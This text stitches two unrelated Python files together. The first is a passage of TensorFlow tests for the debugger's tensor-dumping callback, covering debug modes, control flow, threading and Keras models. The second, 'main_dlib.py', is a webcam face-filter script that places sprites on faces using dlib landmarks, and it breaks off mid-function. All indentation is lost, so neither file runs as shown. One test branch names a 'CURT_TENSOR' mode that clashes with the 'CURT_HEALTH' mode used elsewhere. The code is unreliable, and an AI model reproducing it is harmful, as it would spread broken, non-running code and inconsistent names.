@test_util.run_in_graph_and_eager_modes
def testTensorDTypesAndOpRegexFilters(self,
tensor_dtypes,
op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
tensor_dtypes=tensor_dtypes,
op_regex=op_regex)
@def_function.function
def unique_sum(xs):
"""Sum over the unique values, for testing."""
unique_xs, indices = array_ops.unique(xs)
return math_ops.reduce_sum(unique_xs), indices
xs = constant_op.constant([2., 6., 8., 1., 2.], dtype=dtypes.float32)
y, indices = self.evaluate(unique_sum(xs))
self.assertAllClose(y, 17.)
self.assertAllEqual(indices, [0, 1, 2, 3, 0])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, _,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
if tensor_dtypes == [dtypes.float32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique", "Sum"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllClose(tensor_values[1], 17.) # Sum.
elif tensor_dtypes == ["float32"] and op_regex == "Sum":
self.assertEqual(executed_op_types, ["Sum"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], 17.) # Sum.
elif tensor_dtypes == (dtypes.float32,) and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
elif tensor_dtypes == [dtypes.int32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif callable(tensor_dtypes) and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif not tensor_dtypes and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique", "Unique"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllEqual(tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
else: # "All".
self.assertEqual(executed_op_types, ["Unique", "Unique", "Sum"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllEqual(tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
self.assertAllClose(tensor_values[2], 17.) # Sum.
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testFunctionExecutionWithControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0
i += 1
return x
x = constant_op.constant(0.5, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 8.0)
writer.FlushNonExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
# Verify the content of the .graphs file.
context_ids, op_types, op_name_to_op_type, _ = (
self._readAndCheckGraphsFile(stack_frame_by_id))
self.assertIn("Less", op_types)
self.assertIn("Mul", op_types)
self.assertIn("AddV2", op_types)
# Before FlushExecutionFiles() is called, the .execution and
# .graph_execution_traces files should be both empty.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
graph_execution_traces_iter = reader.graph_execution_traces_iterator()
with self.assertRaises(StopIteration):
next(execution_iter)
with self.assertRaises(StopIteration):
next(graph_execution_traces_iter)
# TODO(cais): Backport execution instrumentation to tf.Session.
writer.FlushExecutionFiles()
# After the flushing, the .execution file should hold the appropriate
# contents.
if context.executing_eagerly():
(executed_op_types, _, input_tensor_ids, output_tensor_ids,
tensor_debug_modes, tensor_values) = self._readAndCheckExecutionFile()
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
self.assertLen(executed_op_types, 1)
self.assertIn("iterative_doubling", executed_op_types[0])
self.assertLen(input_tensor_ids[0], 2)
self.assertLen(output_tensor_ids[0], 1)
self.assertEqual(
tensor_debug_modes[0],
debug_event_pb2.TensorDebugMode.Value(tensor_debug_mode))
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values, [[8.0]])
(op_names, _, output_slots,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# The Less op should have been executed 5 times.
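# (The condition `i < times` is evaluated once per iteration: it holds for the 4
# iterations of the loop body and fails on the 5th check, which exits the loop.)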
self.assertEqual(executed_op_types.count("Less"), 5)
# The last executed op should be Less.
self.assertEqual(executed_op_types[-1], "Less")
# The Mul op should have been executed 4 times.
self.assertEqual(executed_op_types.count("Mul"), 4)
# The AddV2 op should have been run, but we refrain from asserting on how
# many times it's executed.
self.assertIn("AddV2", executed_op_types)
for output_slot in output_slots:
self.assertEqual(output_slot, 0)
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_TENSOR":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "FULL_TENSOR":
less_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Less"
]
self.assertAllClose(less_values, [True, True, True, True, False])
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
self.assertAllClose(mul_values, [1.0, 2.0, 4.0, 8.0])
def testCallingEnableTracingTwiceWithTheSameDumpRootIsIdempotent(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
for _ in range(2):
debug_event = next(execution_iter)
self.assertGreater(debug_event.wall_time, 0)
execution = debug_event.execution
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
self.assertTrue(execution.code_location)
with self.assertRaises(StopIteration):
next(execution_iter)
def testCallingEnableTracingTwiceWithDifferentDumpRootsOverwrites(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
new_dump_root = self.dump_root + "_new_dump_root"
writer = dumping_callback.enable_dump_debug_info(new_dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(new_dump_root) as reader:
execution_iter = reader.execution_iterator()
for _ in range(2):
debug_event = next(execution_iter)
self.assertGreater(debug_event.wall_time, 0)
execution = debug_event.execution
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
self.assertTrue(execution.code_location)
with self.assertRaises(StopIteration):
next(execution_iter)
with debug_events_reader.DebugEventsReader(
self.dump_root) as old_dump_root_reader:
execution_iter = old_dump_root_reader.execution_iterator()
# The old dump root shouldn't have been written to.
with self.assertRaises(StopIteration):
next(execution_iter)
def testCallingEnableRepeatedlyWithDifferentTensorDebugMode(self):
"""Assert that calling enable_dump_debug_info() with different tensor-debug modes.
It should lead to overwriting of the previously-configured mode.
"""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def add_1_divide_by_2(x):
return (x + 1.0) / 2.0
self.assertAllClose(add_1_divide_by_2(constant_op.constant(4.0)), 2.5)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
context_ids, _, _, _ = self._readAndCheckGraphsFile(stack_frame_by_id)
_, _, _, _, _, tensor_values = self._readAndCheckExecutionFile()
self.assertEqual(tensor_values, [[]])
(_, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
self.assertLen(tensor_values, 2)
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
with self.assertRaisesRegexp(
ValueError, r"already.*NO_TENSOR.*FULL_TENSOR.*not be honored"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR")
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
def testDisableTracingWorks(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
dumping_callback.disable_dump_debug_info()
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
source_files_iter = reader.source_files_iterator()
stack_frames_iter = reader.stack_frames_iterator()
execution_iter = reader.execution_iterator()
# No source-file, stack-frame or execution data should have been dumped.
with self.assertRaises(StopIteration):
next(source_files_iter)
with self.assertRaises(StopIteration):
next(stack_frames_iter)
with self.assertRaises(StopIteration):
next(execution_iter)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
def testMultiThreadedExecutionWithSameSetting(self, tensor_debug_mode):
"""Dumping from multiple threads using the same setting."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = variables.Variable(10.0, dtype=dtypes.float32)
y = variables.Variable(3.0, dtype=dtypes.float32)
@def_function.function
def increase_x():
return x.assign_add(y * 2.0)
increase_x()
num_threads = 3
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=increase_x))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# 10 --> 16 --> 22 --> 28 --> 34.
self.assertAllClose(x.read_value(), 34.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
prev_wall_time = 1
for debug_event in execution_iter:
self.assertGreaterEqual(debug_event.wall_time, prev_wall_time)
prev_wall_time = debug_event.wall_time
(context_ids, _,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, output_slots,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types.count("Mul"), 1 + num_threads)
self.assertEqual(
executed_op_types.count("ReadVariableOp"), 2 * (1 + num_threads))
for output_slot in output_slots:
self.assertEqual(output_slot, 0)
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "FULL_TENSOR":
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
self.assertAllClose(mul_values, [6.0, 6.0, 6.0, 6.0])
def testMultiThreadedDumpingWithDifferentSettings(self):
dump_root_1 = os.path.join(self.dump_root, "dump_root_1")
dump_root_2 = os.path.join(self.dump_root, "dump_root_2")
v1 = variables.Variable(10.0, dtype=dtypes.float32)
v2 = variables.Variable(3.0, dtype=dtypes.float32)
def add_negative_v1_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_1, tensor_debug_mode="FULL_TENSOR")
# Run in a loop to facilitate interleaving between threads.
for _ in range(3):
v1.assign_add(-(v1 ** 2.0))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
def add_negative_v2_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_2, tensor_debug_mode="FULL_TENSOR")
v2_squared = v2 ** 2.0
# Since dumping is disabled before the Neg op is called, no tensor data
# should be dumped from the op, but this shouldn't affect the dumping of
# the tensor data from the Neg op in `add_negative_v1_squared_to_itself`.
# Both behaviors are checked below.
dumping_callback.disable_dump_debug_info()
negative_v2_squared = -v2_squared
v2.assign_add(negative_v2_squared)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
# v2 is mutated on a sub-thread.
sub_thread = threading.Thread(target=add_negative_v2_squared_to_itself)
sub_thread.start()
add_negative_v1_squared_to_itself() # v1 is mutated on the main thread.
sub_thread.join()
# 10 - 10 * 10 = -90.
# -90 - (-90 * -90) = -8190.
# -8190 - (-8190 * -8190) = -67084290.
self.assertAllClose(v1.read_value(), -67084290.0)
self.assertAllClose(v2.read_value(), -6.0)
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile(dump_root=dump_root_1)
v1_squared_values = [
tensor_values[i] for i, op_type in enumerate(executed_op_types)
if op_type == "Pow"]
negative_v1_squared_values = [
tensor_values[i] for i, op_type in enumerate(executed_op_types)
if op_type == "Neg"]
self.assertAllClose(v1_squared_values, [[100.0], [8100.0], [67076100.0]])
self.assertAllClose(
negative_v1_squared_values, [[-100.0], [-8100.0], [-67076100.0]])
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile(dump_root=dump_root_2)
self.assertNotIn("Neg", executed_op_types)
v2_squared_values = tensor_values[executed_op_types.index("Pow")]
self.assertAllClose(v2_squared_values, [9.0])
@test_util.run_in_graph_and_eager_modes
def testNestedContextIsCapturedByGraphOpCreationHistory(self):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0 - 1.0
i += 1
return x
x = constant_op.constant(2.0, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
# 2 * 2 - 1 = 3; 3 * 2 - 1 = 5; 5 * 2 - 1 = 9; 9 * 2 - 1 = 17.
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 17.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(_, _, op_name_to_op_type,
op_name_to_context_id) = self._readAndCheckGraphsFile(stack_frame_by_id)
less_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Less"]
less_context_ids = [op_name_to_context_id[op_name]
for op_name in less_op_names]
mul_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Mul"]
mul_context_ids = [op_name_to_context_id[op_name]
for op_name in mul_op_names]
sub_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Sub"]
sub_context_ids = [op_name_to_context_id[op_name]
for op_name in sub_op_names]
self.assertLen(less_context_ids, 1)
self.assertLen(mul_context_ids, 1)
self.assertLen(sub_context_ids, 1)
self.assertTrue(less_context_ids[0])
self.assertTrue(mul_context_ids[0])
self.assertTrue(sub_context_ids[0])
# The Less op is from the while-loop cond context and hence should have
# a different innermost context ID from the mul and sub ops, which are both
# from the while-loop body context.
self.assertNotEqual(less_context_ids[0], mul_context_ids[0])
self.assertNotEqual(less_context_ids[0], sub_context_ids[0])
# The Mul and Sub ops are from the same innermost context.
self.assertEqual(mul_context_ids[0], sub_context_ids[0])
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelPredict(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
batch_size = 5
xs = np.ones([batch_size, 3, 4])
self.assertAllClose(model.predict(xs), np.zeros([batch_size, 1]))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graphs are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
for value_list in tensor_values:
if tensor_debug_mode == "NO_TENSOR":
self.assertFalse(value_list)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the model prediction.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
else:
# Refrain from asserting the internal implementation details of the LSTM
# layer.
concrete_tensor_values = [
value for value in tensor_values
if value is not None and value.size > 0
]
self.assertTrue(concrete_tensor_values)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelFit(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
xs = np.ones([5, 3, 4])
ys = np.ones([5, 1])
history = model.fit(xs, ys, epochs=3, verbose=0)
self.assertAllClose(
history.history["loss"], [1.0, 0.9603999853134155, 0.9223681688308716])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graphs are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
if tensor_debug_mode == "NO_TENSOR":
for value_list in tensor_values:
self.assertFalse(value_list)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the recurrent model's fit() call.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
self.assertTrue(
("SigmoidGrad" in executed_op_types and
"TanhGrad" in executed_op_types or
"CudnnRNNBackprop" in executed_op_types))
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testMobileNetV2Fit(self, tensor_debug_mode):
"""Test that training Keras MobileNetV2 works with dumping enabled."""
# Use a large circular-buffer to make sure we capture all the executed ops.
writer = dumping_callback.enable_dump_debug_info(
self.dump_root,
tensor_debug_mode=tensor_debug_mode,
circular_buffer_size=100000)
model = mobilenet_v2.MobileNetV2(
input_shape=(32, 32, 3), alpha=0.1, weights=None)
y = model.layers[22].output
y = core.Flatten()(y)
y = core.Dense(1)(y)
model = models.Model(inputs=model.inputs, outputs=y)
batch_size = 2
xs = np.zeros([batch_size] + list(model.input_shape[1:]))
ys = np.zeros([batch_size] + list(model.output_shape[1:]))
model.compile(optimizer="sgd", loss="mse")
epochs = 1
history = model.fit(xs, ys, epochs=epochs, verbose=0)
self.assertLen(history.history["loss"], epochs)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graphs are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
executed_op_types, _, _, _, _, _ = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the model's fit() call.
self.assertIn("Conv2D", executed_op_types)
self.assertIn("Relu6", executed_op_types)
self.assertIn("Conv2DBackpropFilter", executed_op_types)
self.assertIn("Relu6Grad", executed_op_types)
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "FULL_TENSOR":
conv2d_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Conv2D"
]
self.assertTrue(conv2d_values)
for conv2d_value in conv2d_values:
self.assertGreater(len(conv2d_value.shape), 1)
self.assertEqual(conv2d_value.shape[0], batch_size)
relu6_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Relu6"
]
self.assertTrue(relu6_values)
for relu6_value in relu6_values:
self.assertGreater(len(relu6_value.shape), 1)
self.assertEqual(relu6_value.shape[0], batch_size)
conv2d_bp_filter_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Conv2DBackpropFilter"
]
self.assertTrue(conv2d_bp_filter_values)
for conv2d_bp_filter_value in conv2d_bp_filter_values:
self.assertGreater(len(conv2d_bp_filter_value.shape), 1)
relu6_grad_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Relu6Grad"
]
self.assertTrue(relu6_grad_values)
for relu6_grad_value in relu6_grad_values:
self.assertGreater(len(relu6_grad_value.shape), 1)
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
main_dlib.py
|
# Requirements:
# pip install tk
# pip install pillow
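# Note: the `from Tkinter import *` import below uses the Python 2 module name;
# on Python 3 the equivalent module is `tkinter` (lowercase).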
from Tkinter import *
from PIL import Image
from PIL import ImageTk
import cv2, threading, os, time
from threading import Thread
from os import listdir
from os.path import isfile, join
import dlib
from imutils import face_utils, rotate_bound
import math
### Function to set which sprite must be drawn
def put_sprite(num):
global SPRITES, BTNS
SPRITES[num] = (1 - SPRITES[num]) # toggle the current value (0 <-> 1)
if SPRITES[num]:
BTNS[num].config(relief=SUNKEN)
else:
BTNS[num].config(relief=RAISED)
# Draws a sprite over an image
# It uses the alpha channel to decide which pixels need to be replaced
# Input: image, sprite: numpy arrays
# Output: resulting merged image
def draw_sprite(frame, sprite, x_offset, y_offset):
(h,w) = (sprite.shape[0], sprite.shape[1])
(imgH,imgW) = (frame.shape[0], frame.shape[1])
if y_offset+h >= imgH: # if the sprite runs past the bottom of the image
sprite = sprite[0:imgH-y_offset,:,:]
if x_offset+w >= imgW: # if the sprite runs past the right edge of the image
sprite = sprite[:,0:imgW-x_offset,:]
if x_offset < 0: # if the sprite runs past the left edge of the image
sprite = sprite[:,abs(x_offset)::,:]
w = sprite.shape[1]
x_offset = 0
# for each of the three colour channels
for c in range(3):
# channel 4 is alpha: 255 is fully opaque, 0 is a fully transparent background
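# i.e. out = alpha * sprite + (1 - alpha) * frame, where alpha = sprite[:,:,3] / 255.0 is applied per pixel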
frame[y_offset:y_offset+h, x_offset:x_offset+w, c] = \
sprite[:,:,c] * (sprite[:,:,3]/255.0) + frame[y_offset:y_offset+h, x_offset:x_offset+w, c] * (1.0 - sprite[:,:,3]/255.0)
return frame
# Adjust the given sprite to the head's width and position
# if the sprite does not fit the screen at the top, it is trimmed
def adjust_sprite2head(sprite, head_width, head_ypos, ontop = True):
(h_sprite,w_sprite) = (sprite.shape[0], sprite.shape[1])
factor = 1.0*head_width/w_sprite
sprite = cv2.resize(sprite, (0,0), fx=factor, fy=factor) # adjust to have the same width as head
(h_sprite,w_sprite) = (sprite.shape[0], sprite.shape[1])
y_orig = head_ypos-h_sprite if ontop else head_ypos # adjust the position of sprite to end where the head begins
if (y_orig < 0): # check whether the head is so close to the top of the image that the sprite would not fit on screen
sprite = sprite[abs(y_orig)::,:,:] #in that case, we cut the sprite
y_orig = 0 #the sprite then begins at the top of the image
return (sprite, y_orig)
# Applies a sprite to the image at the detected face's coordinates and adjusts it to the head
def apply_sprite(image, path2sprite,w,x,y, angle, ontop = True):
sprite = cv2.imread(path2sprite,-1)
#print sprite.shape
sprite = rotate_bound(sprite, angle)
(sprite, y_final) = adjust_sprite2head(sprite, w, y, ontop)
image = draw_sprite(image,sprite,x, y_final)
#points are tuples in the form (x,y)
# returns angle between points in degrees
def calculate_inclination(point1, point2):
x1,x2,y1,y2 = point1[0], point2[0], point1[1], point2[1]
incl = 180/math.pi*math.atan((float(y2-y1))/(x2-x1))
return incl
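# Note: math.atan(dy / dx) above raises ZeroDivisionError if the two points share
# the same x coordinate; math.atan2(y2 - y1, x2 - x1) would avoid that, though for
# the eyebrow landmarks used here dx is effectively never zero.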
def calculate_boundbox(list_coordinates):
x = min(list_coordinates[:,0])
y = min(list_coordinates[:,1])
w = max(list_coordinates[:,0]) - x
h = max(list_coordinates[:,1]) - y
return (x,y,w,h)
def get_face_boundbox(points, face_part):
if face_part == 1:
(x,y,w,h) = calculate_boundbox(points[17:22]) #left eyebrow
elif face_part == 2:
(x,y,w,h) = calculate_boundbox(points[22:27]) #right eyebrow
elif face_part == 3:
(x,y,w,h) = calculate_boundbox(points[36:42]) #left eye
elif face_part == 4:
(x,y,w,h) = calculate_boundbox(points[42:48]) #right eye
elif face_part == 5:
(x,y,w,h) = calculate_boundbox(points[29:36]) #nose
elif face_part == 6:
(x,y,w,h) = calculate_boundbox(points[48:68]) #mouth
return (x,y,w,h)
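# For reference, the slices above follow dlib's 68-point landmark convention:
# 0-16 jaw, 17-21 / 22-26 eyebrows, 27-35 nose, 36-41 / 42-47 eyes, 48-67 mouth
# (60-67 being the inner lip).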
# Main loop where the OpenCV processing (the magic) occurs
def cvloop(run_event):
global panelA
global SPRITES
dir_ = "./sprites/flyes/"
flies = [f for f in listdir(dir_) if isfile(join(dir_, f))] # images of flies used to make the "animation"
i = 0
video_capture = cv2.VideoCapture(0) #read from webcam
(x,y,w,h) = (0,0,10,10) # placeholder initial values
#Filters path
detector = dlib.get_frontal_face_detector()
#Facial landmarks
print("[INFO] loading facial landmark predictor...")
model = "filters/shape_predictor_68_face_landmarks.dat"
predictor = dlib.shape_predictor(model) # link to model: http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
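# (The .dat model file is not bundled with this script; it presumably needs to be
# downloaded from the link above and bz2-extracted into the filters/ directory first.)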
while run_event.is_set(): #while the thread is active we loop
ret, image = video_capture.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = detector(gray, 0)
for face in faces: #if there are faces
(x,y,w,h) = (face.left(), face.top(), face.width(), face.height())
# *** Facial Landmarks detection
shape = predictor(gray, face)
shape = face_utils.shape_to_np(shape)
incl = calculate_inclination(shape[17], shape[26]) #inclination based on eyebrows
# condition to see if mouth is open
is_mouth_open = (shape[66][1] -shape[62][1]) >= 10 # vertical gap in pixels between the inner-lip landmarks (62 top, 66 bottom)
#hat condition
if SPRITES[0]:
apply_sprite(image, "./sprites/hat.png",w,x,y, incl)
#mustache condition
if SPRITES[1]:
(x1,y1,w1,h1) = get_face_boundbox(shape, 6)
